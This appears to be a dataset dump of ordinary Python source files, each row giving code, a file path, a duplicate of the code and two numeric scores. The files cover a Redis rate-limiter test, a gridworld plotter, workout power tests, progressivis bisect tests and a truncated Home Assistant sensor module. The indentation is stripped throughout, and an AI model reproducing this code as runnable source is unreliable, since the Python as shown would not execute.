with monkeypatch.context() as m:
@wraps(RateLimiter.limit)
def fake_limit(*args, **kwargs):
"""
Raises a RedisError to simulate a lack of
space on the disk
"""
raise RedisError
# Now we substitute the limit function with our fake_limit.
m.setattr(RateLimiter, "limit", fake_limit)
client = TestClient(app)
response = client.get(url="http://localhost/v1/places/osm:relation:7515426?lang=es")
assert response.status_code == 200
resp = response.json()
# No wikipedia block should be in the answer.
assert not has_wiki_desc(resp)
# Now that the redis "came back", we are expecting a correct answer from
# Idunn.
response = client.get(url="http://localhost/v1/places/osm:relation:7515426?lang=es")
assert response.status_code == 200
resp = response.json()
# Here the redis is on so the answer should contain the wikipedia block
assert has_wiki_desc(resp)
@freeze_time("2018-06-14 8:30:00", tz_offset=2)
def test_rate_limiter_with_redis_interruption(
docker_services, mock_wikipedia_response, limiter_test_interruption
):
"""
Test that Idunn isn't impacted by any Redis interruption:
If Redis service stops then the wikipedia block should not be returned.
And when Redis restarts the wikipedia block should be returned again
This test has 3 steps:
* A: redis is up: we have the wiki block
* B: redis is down: no wiki block
* C: redis is up again: we have the wiki block again
"""
client = TestClient(app)
response = client.get(url="http://localhost/v1/places/osm:relation:7515426?lang=es")
assert response.status_code == 200
resp = response.json()
# A - Before Redis interruption we check the answer is correct
assert resp["id"] == "osm:relation:7515426"
assert resp["name"] == "Museo del Louvre"
assert resp["local_name"] == "Musée du Louvre"
assert resp["class_name"] == "museum"
assert resp["subclass_name"] == "museum"
assert resp["blocks"][4] == {
"type": "description",
"description": "El Museo del Louvre es el museo nacional de Francia ...",
"source": "wikipedia",
"url": "https://es.wikipedia.org/wiki/Museo_del_Louvre",
}
# B - We interrupt the Redis service and we make a new Idunn request
docker_services._docker_compose.execute("stop", "wiki_redis")
response = client.get(url="http://localhost/v1/places/osm:relation:7515426?lang=es")
assert response.status_code == 200
# The wikipedia block should not be returned: we check we have all the
# information, except the wikipedia block.
resp = response.json()
assert resp["id"] == "osm:relation:7515426"
assert resp["name"] == "Museo del Louvre"
assert resp["local_name"] == "Musée du Louvre"
assert resp["class_name"] == "museum"
assert resp["subclass_name"] == "museum"
assert not has_wiki_desc(resp)
# C - When Redis service restarts the wikipedia block should be returned again.
restart_wiki_redis(docker_services)
response = client.get(url="http://localhost/v1/places/osm:relation:7515426?lang=es")
assert response.status_code == 200
resp = response.json()
assert resp["id"] == "osm:relation:7515426"
assert resp["name"] == "Museo del Louvre"
assert resp["local_name"] == "Musée du Louvre"
assert resp["class_name"] == "museum"
assert resp["subclass_name"] == "museum"
assert resp["blocks"][4] == {
"type": "description",
"description": "El Museo del Louvre es el museo nacional de Francia ...",
"source": "wikipedia",
"url": "https://es.wikipedia.org/wiki/Museo_del_Louvre",
} | 0.609524 | 0.406037 |
from .helper_utilities import unflatten_state
from .env import GridWorldMDP
import numpy as np
class GridWorldPlotter(object):
def __init__(self, grid_size, has_absorbing_state=True):
"""
Utility to plot gridworlds
:param grid_size: size of the gridworld
:param has_absorbing_state: boolean representing if the gridworld has an absorbing state
"""
if isinstance(grid_size, (GridWorldMDP,)):
raise TypeError('grid_size cannot be a GridWorldMDP. '
'To instantiate from GridWorldMDP use GridWorldPlotter.from_mdp()')
assert type(grid_size) is int, 'Gridworld size must be int'
self.size = grid_size
self.has_absorbing_state = has_absorbing_state
# TODO: store where the rewards are so we can plot them.
def _unflatten(self, onehot_state):
return unflatten_state(onehot_state, self.size, self.has_absorbing_state)
@staticmethod
def from_mdp(mdp):
# TODO: obtain reward specifications
if not isinstance(mdp, (GridWorldMDP,)):
raise TypeError('Only GridWorldMDPs can be used with GridWorldPlotters')
return GridWorldPlotter(mdp.size, mdp.has_absorbing_state)
def plot_grid(self, ax):
"""
Plots the skeleton of the grid world
:param ax:
:return:
"""
for i in range(self.size + 1):
ax.plot(np.arange(self.size + 1) - 0.5, np.ones(self.size + 1) * i - 0.5, color='k')
for i in range(self.size + 1):
ax.plot(np.ones(self.size + 1) * i - 0.5, np.arange(self.size + 1) - 0.5, color='k')
ax.set_xlabel('x')
ax.set_ylabel('y')
ax.grid(False)
return ax
def plot_trajectories(self, ax, trajectories, dont_unflatten=False, jitter_scale=1):
"""
Plots a individual trajectory paths with some jitter.
:param ax: The axes to plot this on
:param trajectories: a list of trajectories. Each trajectory is a list of states (numpy arrays)
These states should be obtained by using the mdp.step() operation. To prevent
this automatic conversion use `dont_unflatten`
:param dont_unflatten: will not automatically unflatten the trajectories into (x,y) pairs.
(!) this assumes you have already unflattened them!
:return:
"""
if not dont_unflatten:
trajectories_unflat = list(self.unflat_trajectories(trajectories))
else:
trajectories_unflat = trajectories
for trajectory_unflattened in trajectories_unflat:
x, y = list(zip(*trajectory_unflattened))
x = np.array(x) + jitter_scale * np.random.rand(len(x)) / (2 * self.size)
y = np.array(y) + jitter_scale * np.random.rand(len(x)) / (2 * self.size)
ax.plot(x, y)
return ax
def plot_environment(self, ax, wall_locs=None, plot_grid=False):
"""
Plots the environment with walls.
:param ax: The axes to plot this on
:param wall_locs: Locations of the walls for plotting them in a different color..
:return:
"""
# plot states with background color white
state_background = np.ones((self.size, self.size))
# plot walls in lame way -- set them to some hand-engineered color
wall_img = np.zeros((self.size, self.size, 4))
if wall_locs is not None:
for state in wall_locs:
y_coord = state[0]
x_coord = state[1]
wall_img[y_coord, x_coord, 0] = 0.0 # R
wall_img[y_coord, x_coord, 1] = 0.0 # G
wall_img[y_coord, x_coord, 2] = 0.0 # B
wall_img[y_coord, x_coord, 3] = 1.0 # alpha
# render heatmap and overlay the walls image
imshow_ax = ax.imshow(state_background, interpolation=None)
imshow_ax = ax.imshow(wall_img, interpolation=None)
ax.grid(False)
# Switch on flag if you want to plot grid
if plot_grid:
for i in range(self.size + 1):
ax.plot(np.arange(self.size + 1) - 0.5, np.ones(self.size + 1) * i - 0.5, color='k')
for i in range(self.size + 1):
ax.plot(np.ones(self.size + 1) * i - 0.5, np.arange(self.size + 1) - 0.5, color='k')
ax.set_xlabel('x')
ax.set_ylabel('y')
return ax, imshow_ax
def plot_heatmap(self, ax, trajectories, dont_unflatten=False, wall_locs=None):
"""
Plots a state-visitation heatmap with walls.
:param ax: The axes to plot this on.
:param trajectories: a list of trajectories. Each trajectory is a list of states (numpy arrays)
These states should be obtained by using the mdp.step() operation. To prevent
this automatic conversion use `dont_unflatten`
:param dont_unflatten: will not automatically unflatten the trajectories into (x,y) pairs.
(!) this assumes you have already unflattened them!
:param wall_locs: Locations of the walls for plotting them in a different color..
:return:
"""
if not dont_unflatten:
trajectories_unflat = list(self.unflat_trajectories(trajectories))
else:
trajectories_unflat = trajectories
state_visitations = np.zeros((self.size, self.size))
# plot actual state visitation heatmap
for trajectory in trajectories_unflat:
for state in trajectory:
x_coord =state[0]
y_coord = state[1]
state_visitations[y_coord, x_coord] += 1.
# plot walls in lame way -- set them to some hand-engineered color
wall_img = np.zeros((self.size, self.size, 4))
if wall_locs is not None:
mid_visits = (np.max(state_visitations) - np.min(state_visitations)) / 2.
for state in wall_locs:
y_coord = state[0]
x_coord = state[1]
wall_img[y_coord, x_coord, 0] = 0.6 # R
wall_img[y_coord, x_coord, 1] = 0.4 # G
wall_img[y_coord, x_coord, 2] = 0.4 # B
wall_img[y_coord, x_coord, 3] = 1.0 # alpha
# render heatmap and overlay the walls image
imshow_ax = ax.imshow(state_visitations, interpolation=None)
imshow_ax = ax.imshow(wall_img, interpolation=None)
ax.grid(False)
return ax, imshow_ax
def unflat_trajectories(self, trajectories):
"""
Returns a generator where the trajectories have been unflattened.
:param trajectories:
:return:
"""
return map(lambda traj: list(map(self._unflatten, traj)), trajectories) | emdp/gridworld/plotting.py | from .helper_utilities import unflatten_state
from .env import GridWorldMDP
import numpy as np
class GridWorldPlotter(object):
def __init__(self, grid_size, has_absorbing_state=True):
"""
Utility to plot gridworlds
:param grid_size: size of the gridworld
:param has_absorbing_state: boolean representing if the gridworld has an absorbing state
"""
if isinstance(grid_size, (GridWorldMDP,)):
raise TypeError('grid_size cannot be a GridWorldMDP. '
'To instantiate from GridWorldMDP use GridWorldPlotter.from_mdp()')
assert type(grid_size) is int, 'Gridworld size must be int'
self.size = grid_size
self.has_absorbing_state = has_absorbing_state
# TODO: store where the rewards are so we can plot them.
def _unflatten(self, onehot_state):
return unflatten_state(onehot_state, self.size, self.has_absorbing_state)
@staticmethod
def from_mdp(mdp):
# TODO: obtain reward specifications
if not isinstance(mdp, (GridWorldMDP,)):
raise TypeError('Only GridWorldMDPs can be used with GridWorldPlotters')
return GridWorldPlotter(mdp.size, mdp.has_absorbing_state)
def plot_grid(self, ax):
"""
Plots the skeleton of the grid world
:param ax:
:return:
"""
for i in range(self.size + 1):
ax.plot(np.arange(self.size + 1) - 0.5, np.ones(self.size + 1) * i - 0.5, color='k')
for i in range(self.size + 1):
ax.plot(np.ones(self.size + 1) * i - 0.5, np.arange(self.size + 1) - 0.5, color='k')
ax.set_xlabel('x')
ax.set_ylabel('y')
ax.grid(False)
return ax
def plot_trajectories(self, ax, trajectories, dont_unflatten=False, jitter_scale=1):
"""
Plots a individual trajectory paths with some jitter.
:param ax: The axes to plot this on
:param trajectories: a list of trajectories. Each trajectory is a list of states (numpy arrays)
These states should be obtained by using the mdp.step() operation. To prevent
this automatic conversion use `dont_unflatten`
:param dont_unflatten: will not automatically unflatten the trajectories into (x,y) pairs.
(!) this assumes you have already unflattened them!
:return:
"""
if not dont_unflatten:
trajectories_unflat = list(self.unflat_trajectories(trajectories))
else:
trajectories_unflat = trajectories
for trajectory_unflattened in trajectories_unflat:
x, y = list(zip(*trajectory_unflattened))
x = np.array(x) + jitter_scale * np.random.rand(len(x)) / (2 * self.size)
y = np.array(y) + jitter_scale * np.random.rand(len(x)) / (2 * self.size)
ax.plot(x, y)
return ax
def plot_environment(self, ax, wall_locs=None, plot_grid=False):
"""
Plots the environment with walls.
:param ax: The axes to plot this on
:param wall_locs: Locations of the walls for plotting them in a different color..
:return:
"""
# plot states with background color white
state_background = np.ones((self.size, self.size))
# plot walls in lame way -- set them to some hand-engineered color
wall_img = np.zeros((self.size, self.size, 4))
if wall_locs is not None:
for state in wall_locs:
y_coord = state[0]
x_coord = state[1]
wall_img[y_coord, x_coord, 0] = 0.0 # R
wall_img[y_coord, x_coord, 1] = 0.0 # G
wall_img[y_coord, x_coord, 2] = 0.0 # B
wall_img[y_coord, x_coord, 3] = 1.0 # alpha
# render heatmap and overlay the walls image
imshow_ax = ax.imshow(state_background, interpolation=None)
imshow_ax = ax.imshow(wall_img, interpolation=None)
ax.grid(False)
# Switch on flag if you want to plot grid
if plot_grid:
for i in range(self.size + 1):
ax.plot(np.arange(self.size + 1) - 0.5, np.ones(self.size + 1) * i - 0.5, color='k')
for i in range(self.size + 1):
ax.plot(np.ones(self.size + 1) * i - 0.5, np.arange(self.size + 1) - 0.5, color='k')
ax.set_xlabel('x')
ax.set_ylabel('y')
return ax, imshow_ax
def plot_heatmap(self, ax, trajectories, dont_unflatten=False, wall_locs=None):
"""
Plots a state-visitation heatmap with walls.
:param ax: The axes to plot this on.
:param trajectories: a list of trajectories. Each trajectory is a list of states (numpy arrays)
These states should be obtained by using the mdp.step() operation. To prevent
this automatic conversion use `dont_unflatten`
:param dont_unflatten: will not automatically unflatten the trajectories into (x,y) pairs.
(!) this assumes you have already unflattened them!
:param wall_locs: Locations of the walls for plotting them in a different color..
:return:
"""
if not dont_unflatten:
trajectories_unflat = list(self.unflat_trajectories(trajectories))
else:
trajectories_unflat = trajectories
state_visitations = np.zeros((self.size, self.size))
# plot actual state visitation heatmap
for trajectory in trajectories_unflat:
for state in trajectory:
x_coord =state[0]
y_coord = state[1]
state_visitations[y_coord, x_coord] += 1.
# plot walls in lame way -- set them to some hand-engineered color
wall_img = np.zeros((self.size, self.size, 4))
if wall_locs is not None:
mid_visits = (np.max(state_visitations) - np.min(state_visitations)) / 2.
for state in wall_locs:
y_coord = state[0]
x_coord = state[1]
wall_img[y_coord, x_coord, 0] = 0.6 # R
wall_img[y_coord, x_coord, 1] = 0.4 # G
wall_img[y_coord, x_coord, 2] = 0.4 # B
wall_img[y_coord, x_coord, 3] = 1.0 # alpha
# render heatmap and overlay the walls image
imshow_ax = ax.imshow(state_visitations, interpolation=None)
imshow_ax = ax.imshow(wall_img, interpolation=None)
ax.grid(False)
return ax, imshow_ax
def unflat_trajectories(self, trajectories):
"""
Returns a generator where the trajectories have been unflattened.
:param trajectories:
:return:
"""
return map(lambda traj: list(map(self._unflatten, traj)), trajectories) | 0.74826 | 0.663056 |
import unittest
from garminworkouts.models.power import Power
class PowerTestCase(unittest.TestCase):
def test_valid_power_to_watts_conversion(self):
ftp = 200
diff = 0
valid_powers = [
("0", 0),
("0%", 0),
("10", 20),
("10%", 20),
("100", 200),
("100%", 200),
("120", 240),
("120%", 240),
("150", 300),
("150%", 300),
("0W", 0),
("0w", 0),
("100W", 100),
("100w", 100),
("1000W", 1000),
("1000w", 1000)
]
for power, watts in valid_powers:
with self.subTest(msg="Expected %d watts for '%s' (ftp=%s, diff=%s)" % (watts, power, ftp, diff)):
self.assertEqual(Power(power).to_watts(ftp, diff), watts)
def test_invalid_power_to_watts_conversion(self):
ftp = 200
diff = 0
invalid_powers = ["-1", "-1%", "2500", "2500%", "-1W", "5000W", "foo", "foo%", "fooW"]
for power in invalid_powers:
with self.subTest(msg="Expected ValueError for '%s" % power):
with self.assertRaises(ValueError):
Power(power).to_watts(ftp, diff)
def test_power_to_watts_conversion_with_valid_diff(self):
power = "100"
ftp = 200
valid_diffs = [
(0.5, 300),
(0.05, 210),
(-0.05, 190),
(-0.5, 100)
]
for diff, watts in valid_diffs:
with self.subTest(msg="Expected %d watts for diff '%s' (power=%s, ftp=%s)" % (watts, diff, power, ftp)):
self.assertEqual(Power(power).to_watts(ftp, diff), watts)
def test_power_to_watts_conversion_with_invalid_diff(self):
power = "100"
ftp = 200
invalid_diffs = [-1.0, 1.0, "foo"]
for diff in invalid_diffs:
with self.subTest(msg="Expected ValueError for '%s" % diff):
with self.assertRaises(ValueError):
Power(power).to_watts(ftp, diff)
def test_power_to_watts_conversion_with_valid_ftp(self):
power = "50"
diff = 0
valid_ftps = [
(0, 0),
(100, 50),
(250, 125),
(999, 500)
]
for ftp, watts in valid_ftps:
with self.subTest(msg="Expected %d watts for ftp '%s' (power=%s, diff=%s)" % (watts, ftp, power, diff)):
self.assertEqual(Power(power).to_watts(ftp, diff), watts)
def test_power_to_watts_conversion_with_invalid_ftp(self):
power = "100"
diff = 0
invalid_ftps = [-1, 1000, "foo"]
for ftp in invalid_ftps:
with self.subTest(msg="Expected ValueError for '%s" % ftp):
with self.assertRaises(ValueError):
Power(power).to_watts(ftp, diff)
if __name__ == '__main__':
unittest.main() | tests/models/test_power.py | import unittest
from garminworkouts.models.power import Power
class PowerTestCase(unittest.TestCase):
def test_valid_power_to_watts_conversion(self):
ftp = 200
diff = 0
valid_powers = [
("0", 0),
("0%", 0),
("10", 20),
("10%", 20),
("100", 200),
("100%", 200),
("120", 240),
("120%", 240),
("150", 300),
("150%", 300),
("0W", 0),
("0w", 0),
("100W", 100),
("100w", 100),
("1000W", 1000),
("1000w", 1000)
]
for power, watts in valid_powers:
with self.subTest(msg="Expected %d watts for '%s' (ftp=%s, diff=%s)" % (watts, power, ftp, diff)):
self.assertEqual(Power(power).to_watts(ftp, diff), watts)
def test_invalid_power_to_watts_conversion(self):
ftp = 200
diff = 0
invalid_powers = ["-1", "-1%", "2500", "2500%", "-1W", "5000W", "foo", "foo%", "fooW"]
for power in invalid_powers:
with self.subTest(msg="Expected ValueError for '%s" % power):
with self.assertRaises(ValueError):
Power(power).to_watts(ftp, diff)
def test_power_to_watts_conversion_with_valid_diff(self):
power = "100"
ftp = 200
valid_diffs = [
(0.5, 300),
(0.05, 210),
(-0.05, 190),
(-0.5, 100)
]
for diff, watts in valid_diffs:
with self.subTest(msg="Expected %d watts for diff '%s' (power=%s, ftp=%s)" % (watts, diff, power, ftp)):
self.assertEqual(Power(power).to_watts(ftp, diff), watts)
def test_power_to_watts_conversion_with_invalid_diff(self):
power = "100"
ftp = 200
invalid_diffs = [-1.0, 1.0, "foo"]
for diff in invalid_diffs:
with self.subTest(msg="Expected ValueError for '%s" % diff):
with self.assertRaises(ValueError):
Power(power).to_watts(ftp, diff)
def test_power_to_watts_conversion_with_valid_ftp(self):
power = "50"
diff = 0
valid_ftps = [
(0, 0),
(100, 50),
(250, 125),
(999, 500)
]
for ftp, watts in valid_ftps:
with self.subTest(msg="Expected %d watts for ftp '%s' (power=%s, diff=%s)" % (watts, ftp, power, diff)):
self.assertEqual(Power(power).to_watts(ftp, diff), watts)
def test_power_to_watts_conversion_with_invalid_ftp(self):
power = "100"
diff = 0
invalid_ftps = [-1, 1000, "foo"]
for ftp in invalid_ftps:
with self.subTest(msg="Expected ValueError for '%s" % ftp):
with self.assertRaises(ValueError):
Power(power).to_watts(ftp, diff)
if __name__ == '__main__':
unittest.main() | 0.542379 | 0.628151 |
from progressivis.table.table import Table
from progressivis.table.constant import Constant
from progressivis import Print
from progressivis.stats import RandomTable
from progressivis.table.bisectmod import Bisect
from progressivis.core.bitmap import bitmap
from progressivis.table.hist_index import HistogramIndex
from progressivis.core import aio
from progressivis.table.stirrer import Stirrer
from . import ProgressiveTest
class TestBisect(ProgressiveTest):
def test_bisect(self):
s = self.scheduler()
random = RandomTable(2, rows=1000_000, scheduler=s)
t = Table(name=None, dshape='{value: string}', data={'value':[0.5]})
min_value = Constant(table=t, scheduler=s)
hist_index = HistogramIndex(column='_1', scheduler=s)
hist_index.create_dependent_modules(random, 'result')
bisect_ = Bisect(column='_1', op='>', hist_index=hist_index, scheduler=s)
bisect_.input[0] = hist_index.output.result
#bisect_.input[0] = random.output.result
bisect_.input.limit = min_value.output.result
pr = Print(proc=self.terse, scheduler=s)
pr.input[0] = bisect_.output.result
aio.run(s.start())
#hist_index._impl.dump()
idx = random.result.eval('_1>0.5', result_object='index')
self.assertEqual(bisect_.result.index, bitmap(idx))
def test_bisect2(self):
s = self.scheduler()
random = RandomTable(2, rows=100_000, scheduler=s)
stirrer = Stirrer(update_column='_1', delete_rows=100,
#update_rows=5,
#fixed_step_size=100,
scheduler=s)
stirrer.input[0] = random.output.result
t = Table(name=None, dshape='{value: string}', data={'value':[0.5]})
min_value = Constant(table=t, scheduler=s)
hist_index = HistogramIndex(column='_1', scheduler=s)
hist_index.create_dependent_modules(stirrer, 'result')
bisect_ = Bisect(column='_1', op='>', hist_index=hist_index, scheduler=s)
bisect_.input[0] = hist_index.output.result
#bisect_.input[0] = random.output.result
bisect_.input.limit = min_value.output.result
pr = Print(proc=self.terse, scheduler=s)
pr.input[0] = bisect_.output.result
aio.run(s.start())
idx = stirrer.result.eval('_1>0.5', result_object='index')
self.assertEqual(bisect_.result.index, bitmap(idx))
def test_bisect3(self):
s = self.scheduler()
random = RandomTable(2, rows=100_000, scheduler=s)
stirrer = Stirrer(update_column='_1', update_rows=100,
fixed_step_size=100, scheduler=s)
stirrer.input[0] = random.output.result
t = Table(name=None, dshape='{value: string}', data={'value':[0.5]})
min_value = Constant(table=t, scheduler=s)
hist_index = HistogramIndex(column='_1', scheduler=s)
hist_index.create_dependent_modules(stirrer, 'result')
bisect_ = Bisect(column='_1', op='>', hist_index=hist_index, scheduler=s)
bisect_.input[0] = hist_index.output.result
#bisect_.input[0] = random.output.result
bisect_.input.limit = min_value.output.result
pr = Print(proc=self.terse, scheduler=s)
pr.input[0] = bisect_.output.result
aio.run(s.start())
idx = stirrer.result.eval('_1>0.5', result_object='index')
self.assertEqual(bisect_.result.index, bitmap(idx))
if __name__ == '__main__':
ProgressiveTest.main() | tests/test_03_bisect.py | from progressivis.table.table import Table
from progressivis.table.constant import Constant
from progressivis import Print
from progressivis.stats import RandomTable
from progressivis.table.bisectmod import Bisect
from progressivis.core.bitmap import bitmap
from progressivis.table.hist_index import HistogramIndex
from progressivis.core import aio
from progressivis.table.stirrer import Stirrer
from . import ProgressiveTest
class TestBisect(ProgressiveTest):
def test_bisect(self):
s = self.scheduler()
random = RandomTable(2, rows=1000_000, scheduler=s)
t = Table(name=None, dshape='{value: string}', data={'value':[0.5]})
min_value = Constant(table=t, scheduler=s)
hist_index = HistogramIndex(column='_1', scheduler=s)
hist_index.create_dependent_modules(random, 'result')
bisect_ = Bisect(column='_1', op='>', hist_index=hist_index, scheduler=s)
bisect_.input[0] = hist_index.output.result
#bisect_.input[0] = random.output.result
bisect_.input.limit = min_value.output.result
pr = Print(proc=self.terse, scheduler=s)
pr.input[0] = bisect_.output.result
aio.run(s.start())
#hist_index._impl.dump()
idx = random.result.eval('_1>0.5', result_object='index')
self.assertEqual(bisect_.result.index, bitmap(idx))
def test_bisect2(self):
s = self.scheduler()
random = RandomTable(2, rows=100_000, scheduler=s)
stirrer = Stirrer(update_column='_1', delete_rows=100,
#update_rows=5,
#fixed_step_size=100,
scheduler=s)
stirrer.input[0] = random.output.result
t = Table(name=None, dshape='{value: string}', data={'value':[0.5]})
min_value = Constant(table=t, scheduler=s)
hist_index = HistogramIndex(column='_1', scheduler=s)
hist_index.create_dependent_modules(stirrer, 'result')
bisect_ = Bisect(column='_1', op='>', hist_index=hist_index, scheduler=s)
bisect_.input[0] = hist_index.output.result
#bisect_.input[0] = random.output.result
bisect_.input.limit = min_value.output.result
pr = Print(proc=self.terse, scheduler=s)
pr.input[0] = bisect_.output.result
aio.run(s.start())
idx = stirrer.result.eval('_1>0.5', result_object='index')
self.assertEqual(bisect_.result.index, bitmap(idx))
def test_bisect3(self):
s = self.scheduler()
random = RandomTable(2, rows=100_000, scheduler=s)
stirrer = Stirrer(update_column='_1', update_rows=100,
fixed_step_size=100, scheduler=s)
stirrer.input[0] = random.output.result
t = Table(name=None, dshape='{value: string}', data={'value':[0.5]})
min_value = Constant(table=t, scheduler=s)
hist_index = HistogramIndex(column='_1', scheduler=s)
hist_index.create_dependent_modules(stirrer, 'result')
bisect_ = Bisect(column='_1', op='>', hist_index=hist_index, scheduler=s)
bisect_.input[0] = hist_index.output.result
#bisect_.input[0] = random.output.result
bisect_.input.limit = min_value.output.result
pr = Print(proc=self.terse, scheduler=s)
pr.input[0] = bisect_.output.result
aio.run(s.start())
idx = stirrer.result.eval('_1>0.5', result_object='index')
self.assertEqual(bisect_.result.index, bitmap(idx))
if __name__ == '__main__':
ProgressiveTest.main() | 0.38827 | 0.490968 |
from __future__ import annotations
from dataclasses import dataclass
from functools import partial
from homeassistant.components.sensor import (
STATE_CLASS_MEASUREMENT,
STATE_CLASS_TOTAL_INCREASING,
SensorEntity,
SensorEntityDescription,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import (
DEVICE_CLASS_TEMPERATURE,
TEMP_CELSIUS,
VOLUME_CUBIC_METERS,
)
from homeassistant.core import HomeAssistant, callback
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from . import RainMachineEntity
from .const import (
DATA_CONTROLLER,
DATA_COORDINATOR,
DATA_PROVISION_SETTINGS,
DATA_RESTRICTIONS_UNIVERSAL,
DOMAIN,
)
from .model import RainMachineSensorDescriptionMixin
TYPE_FLOW_SENSOR_CLICK_M3 = "flow_sensor_clicks_cubic_meter"
TYPE_FLOW_SENSOR_CONSUMED_LITERS = "flow_sensor_consumed_liters"
TYPE_FLOW_SENSOR_START_INDEX = "flow_sensor_start_index"
TYPE_FLOW_SENSOR_WATERING_CLICKS = "flow_sensor_watering_clicks"
TYPE_FREEZE_TEMP = "freeze_protect_temp"
@dataclass
class RainMachineSensorEntityDescription(
SensorEntityDescription, RainMachineSensorDescriptionMixin
):
"""Describe a RainMachine sensor."""
SENSOR_DESCRIPTIONS = (
RainMachineSensorEntityDescription(
key=TYPE_FLOW_SENSOR_CLICK_M3,
name="Flow Sensor Clicks per Cubic Meter",
icon="mdi:water-pump",
native_unit_of_measurement=f"clicks/{VOLUME_CUBIC_METERS}",
entity_registry_enabled_default=False,
state_class=STATE_CLASS_MEASUREMENT,
api_category=DATA_PROVISION_SETTINGS,
),
RainMachineSensorEntityDescription(
key=TYPE_FLOW_SENSOR_CONSUMED_LITERS,
name="Flow Sensor Consumed Liters",
icon="mdi:water-pump",
native_unit_of_measurement="liter",
entity_registry_enabled_default=False,
state_class=STATE_CLASS_TOTAL_INCREASING,
api_category=DATA_PROVISION_SETTINGS,
),
RainMachineSensorEntityDescription(
key=TYPE_FLOW_SENSOR_START_INDEX,
name="Flow Sensor Start Index",
icon="mdi:water-pump",
native_unit_of_measurement="index",
entity_registry_enabled_default=False,
api_category=DATA_PROVISION_SETTINGS,
),
RainMachineSensorEntityDescription(
key=TYPE_FLOW_SENSOR_WATERING_CLICKS,
name="Flow Sensor Clicks",
icon="mdi:water-pump",
native_unit_of_measurement="clicks",
entity_registry_enabled_default=False,
state_class=STATE_CLASS_MEASUREMENT,
api_category=DATA_PROVISION_SETTINGS,
),
RainMachineSensorEntityDescription(
key=TYPE_FREEZE_TEMP,
name="Freeze Protect Temperature",
icon="mdi:thermometer",
native_unit_of_measurement=TEMP_CELSIUS,
device_class=DEVICE_CLASS_TEMPERATURE,
state_class=STATE_CLASS_MEASUREMENT,
api_category=DATA_RESTRICTIONS_UNIVERSAL,
),
)
async def async_setup_entry(
hass: HomeAssistant, entry: ConfigEntry, async_add_entities: AddEntitiesCallback
) -> None:
"""Set up RainMachine sensors based on a config entry."""
controller = hass.data[DOMAIN][DATA_CONTROLLER][entry.entry_id]
coordinators = hass.data[DOMAIN][DATA_COORDINATOR][entry.entry_id]
@callback
def async_get_sensor(api_category: str) -> partial:
"""Generate the appropriate sensor object for an API category."""
if api_category == DATA_PROVISION_SETTINGS:
return partial(
ProvisionSettingsSensor,
entry,
coordinators[DATA_PROVISION_SETTINGS],
)
return partial(
UniversalRestrictionsSensor,
entry,
coordinators[DATA_RESTRICTIONS_UNIVERSAL],
)
async_add_entities(
[
async_get_sensor(description.api_category)(controller, description)
for description in SENSOR_DESCRIPTIONS
]
)
class ProvisionSettingsSensor(RainMachineEntity, SensorEntity):
"""Define a sensor that handles provisioning data."""
@callback
def update_from_latest_data(self) -> None:
"""Update the state."""
if self.entity_description.key == TYPE_FLOW_SENSOR_CLICK_M3:
self._attr_native_value = self.coordinator.data["system"].get(
"flowSensorClicksPerCubicMeter"
)
elif self.entity_description.key == TYPE_FLOW_SENSOR_CONSUMED_LITERS:
clicks = self.coordinator.data["system"].get("flowSensorWateringClicks")
clicks_per_m3 = self.coordinator.data["system"].get(
"flowSensorClicksPerCubicMeter"
)
if clicks and clicks_per_m3:
self._attr_native_value = (clicks * 1000) / clicks_per_m3
else:
self._attr_native_value = None
elif self.entity_description.key == TYPE_FLOW_SENSOR_START_INDEX:
self._attr_native_value = self.coordinator.data["system"].get(
"flowSensorStartIndex"
)
elif self.entity_description.key == TYPE_FLOW_SENSOR_WATERING_CLICKS:
self._attr_native_value = self.coordinator.data["system"].get(
"flowSensorWateringClicks"
)
class UniversalRestrictionsSensor(RainMachineEntity, SensorEntity):
"""Define a sensor that handles universal restrictions data."""
@callback
def update_from_latest_data(self) -> None:
"""Update the state."""
if self.entity_description.key == TYPE_FREEZE_TEMP:
self._attr_native_value = self.coordinator.data["freezeProtectTemp"] | homeassistant/components/rainmachine/sensor.py | from __future__ import annotations
from dataclasses import dataclass
from functools import partial
from homeassistant.components.sensor import (
STATE_CLASS_MEASUREMENT,
STATE_CLASS_TOTAL_INCREASING,
SensorEntity,
SensorEntityDescription,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import (
DEVICE_CLASS_TEMPERATURE,
TEMP_CELSIUS,
VOLUME_CUBIC_METERS,
)
from homeassistant.core import HomeAssistant, callback
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from . import RainMachineEntity
from .const import (
DATA_CONTROLLER,
DATA_COORDINATOR,
DATA_PROVISION_SETTINGS,
DATA_RESTRICTIONS_UNIVERSAL,
DOMAIN,
)
from .model import RainMachineSensorDescriptionMixin
TYPE_FLOW_SENSOR_CLICK_M3 = "flow_sensor_clicks_cubic_meter"
TYPE_FLOW_SENSOR_CONSUMED_LITERS = "flow_sensor_consumed_liters"
TYPE_FLOW_SENSOR_START_INDEX = "flow_sensor_start_index"
TYPE_FLOW_SENSOR_WATERING_CLICKS = "flow_sensor_watering_clicks"
TYPE_FREEZE_TEMP = "freeze_protect_temp"
@dataclass
class RainMachineSensorEntityDescription(
SensorEntityDescription, RainMachineSensorDescriptionMixin
):
"""Describe a RainMachine sensor."""
SENSOR_DESCRIPTIONS = (
RainMachineSensorEntityDescription(
key=TYPE_FLOW_SENSOR_CLICK_M3,
name="Flow Sensor Clicks per Cubic Meter",
icon="mdi:water-pump",
native_unit_of_measurement=f"clicks/{VOLUME_CUBIC_METERS}",
entity_registry_enabled_default=False,
state_class=STATE_CLASS_MEASUREMENT,
api_category=DATA_PROVISION_SETTINGS,
),
RainMachineSensorEntityDescription(
key=TYPE_FLOW_SENSOR_CONSUMED_LITERS,
name="Flow Sensor Consumed Liters",
icon="mdi:water-pump",
native_unit_of_measurement="liter",
entity_registry_enabled_default=False,
state_class=STATE_CLASS_TOTAL_INCREASING,
api_category=DATA_PROVISION_SETTINGS,
),
RainMachineSensorEntityDescription(
key=TYPE_FLOW_SENSOR_START_INDEX,
name="Flow Sensor Start Index",
icon="mdi:water-pump",
native_unit_of_measurement="index",
entity_registry_enabled_default=False,
api_category=DATA_PROVISION_SETTINGS,
),
RainMachineSensorEntityDescription(
key=TYPE_FLOW_SENSOR_WATERING_CLICKS,
name="Flow Sensor Clicks",
icon="mdi:water-pump",
native_unit_of_measurement="clicks",
entity_registry_enabled_default=False,
state_class=STATE_CLASS_MEASUREMENT,
api_category=DATA_PROVISION_SETTINGS,
),
RainMachineSensorEntityDescription(
